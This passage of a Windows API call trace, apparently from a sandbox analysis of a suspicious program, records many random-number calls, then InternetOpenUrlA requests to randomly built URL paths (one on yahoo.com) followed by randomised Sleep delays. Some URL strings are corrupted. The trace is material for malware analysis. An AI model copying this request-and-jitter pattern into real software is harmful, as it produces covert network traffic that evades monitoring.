BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e6b, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x4d5e6b) returned 0x0 [0256.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0256.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0256.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e83, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x4d5e83) returned 0x0 [0256.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.552] GetProcessHeap () returned 0x440000 [0256.552] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0256.552] lstrcpyA (in: lpString1=0x473140, lpString2="oÌXZs://www.yahoo.com" | out: lpString1="oÌXZs://www.yahoo.com") returned="oÌXZs://www.yahoo.com" [0256.552] lstrcatA (in: lpString1="oÌXZs://www.yahoo.com", lpString2="/9I215cV14Ta719pDepto54H2Z/wb205jz69i9fenRL86w4k4k9gsi20Y1tvg4260PuzNt49tJ/ZygwcrWh91jvzOHPzN6kBgN/1ef2ygh926nxm4Qq/" | out: lpString1="oÌXZs://www.yahoo.com/9I215cV14Ta719pDepto54H2Z/wb205jz69i9fenRL86w4k4k9gsi20Y1tvg4260PuzNt49tJ/ZygwcrWh91jvzOHPzN6kBgN/1ef2ygh926nxm4Qq/") returned="oÌXZs://www.yahoo.com/9I215cV14Ta719pDepto54H2Z/wb205jz69i9fenRL86w4k4k9gsi20Y1tvg4260PuzNt49tJ/ZygwcrWh91jvzOHPzN6kBgN/1ef2ygh926nxm4Qq/" [0256.553] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0256.553] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="oÌXZs://www.yahoo.com/9I215cV14Ta719pDepto54H2Z/wb205jz69i9fenRL86w4k4k9gsi20Y1tvg4260PuzNt49tJ/ZygwcrWh91jvzOHPzN6kBgN/1ef2ygh926nxm4Qq/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0256.554] GetProcessHeap () returned 0x440000 [0256.554] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0256.554] GetProcessHeap () returned 0x440000 [0256.554] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0256.554] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0256.555] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0256.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0256.556] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0256.556] Sleep (dwMilliseconds=0x15313) [0256.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0256.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.742] GetProcessHeap () returned 0x440000 [0256.742] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54b0 [0256.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54b1, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x4f54b1) returned 0x0 [0256.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.747] GetProcessHeap () returned 0x440000 [0256.747] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0256.747] lstrcpyA (in: lpString1=0x473da0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0256.747] lstrcatA (in: lpString1="\x04", lpString2="/wpiybdarpmutnj48zdsv/" | out: lpString1="\x04/wpiybdarpmutnj48zdsv/") returned="\x04/wpiybdarpmutnj48zdsv/" [0256.747] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0256.747] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/wpiybdarpmutnj48zdsv/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0256.747] GetProcessHeap () returned 0x440000 [0256.747] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0256.747] GetProcessHeap () returned 0x440000 [0256.747] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54b0 | out: hHeap=0x440000) returned 1 [0256.748] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0256.748] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0256.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0256.784] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0256.784] Sleep (dwMilliseconds=0x13734) [0256.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0256.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.941] GetProcessHeap () returned 0x440000 [0256.941] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17ca0 [0256.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17ca1, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a17ca1) returned 0x0 [0256.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0256.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17cba, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a17cba) returned 0x0 [0256.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0256.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0256.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0256.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0256.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 